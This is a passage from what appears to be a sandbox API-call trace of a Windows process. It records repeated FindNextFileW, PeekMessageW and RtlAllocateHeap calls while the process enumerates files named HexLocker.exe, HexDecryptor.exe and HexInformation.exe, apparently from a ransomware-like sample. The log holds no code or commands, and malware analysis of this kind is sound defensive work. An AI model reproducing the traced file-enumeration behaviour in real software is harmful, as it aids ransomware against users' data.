lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd48798c8, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd48798c8, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48798c8, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x33fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hexadecimal_Calculator.ns", cAlternateFileName="HEXADE~1.NS")) returned 1 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.485] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.486] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed00 [0125.486] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec20 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebd0 [0125.486] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4adbe4a, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd4adbe4a, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexDCIF.hex", cAlternateFileName="")) returned 1 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec00 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b00 [0125.486] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.486] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.486] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0125.486] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0125.487] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.487] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.487] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe771de0e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe771de0e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4adbe4a, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexDecryptor.exe", cAlternateFileName="HEXDEC~1.EXE")) returned 1 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ba8 [0125.487] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed00 [0125.487] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb50 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebb0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec20 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0125.488] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed40 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eca0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec40 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.488] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ece0 [0125.488] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebc0 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec40 [0125.488] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cb3f4e, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3cb3f4e, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexIF.hex", cAlternateFileName="")) returned 1 [0125.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eb80 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539f8 [0125.489] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.489] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0125.489] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f160 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0125.489] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.489] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.490] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6f0ebef, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe6f0ebef, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3e7b28f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexInformation.exe", cAlternateFileName="HEXINF~1.EXE")) returned 1 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2e0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a70 [0125.490] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec00 [0125.490] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec20 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eba0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed00 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0125.490] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec20 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec80 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ecc0 [0125.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0125.490] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebb0 [0125.491] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebe0 [0125.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eba0 [0125.492] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3faede2, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3faede2, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexLK.hex", cAlternateFileName="")) returned 1 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eb60 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c50 [0125.492] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.492] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0125.492] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0125.492] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.493] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.493] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe81dffe0, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xe81dffe0, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0x0, dwReserved1=0x0, cFileName="HexLocker.exe", cAlternateFileName="HEXLOC~1.EXE")) returned 1 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f2f0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c50 [0125.493] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebc0 [0125.493] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec50 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec00 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec10 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0125.493] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ebc0 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ed20 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ec80 [0125.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0125.494] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec90 [0125.494] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7eb90 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7ec00 [0125.494] FindNextFileW (in: hFindFile=0xa6e800, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebbda1a0, ftCreationTime.dwHighDateTime=0x1d5f024, ftLastAccessTime.dwLowDateTime=0xea16f120, ftLastAccessTime.dwHighDateTime=0x1d5eda0, ftLastWriteTime.dwLowDateTime=0xea16f120, ftLastWriteTime.dwHighDateTime=0x1d5eda0, nFileSizeHigh=0x0, nFileSizeLow=0x106d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="hkGbR.wav", cAlternateFileName="")) returned 1 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7eb60 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a88 [0125.494] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.494] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2f0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0125.494] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f160 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e7f2e0 [0125.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0125.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 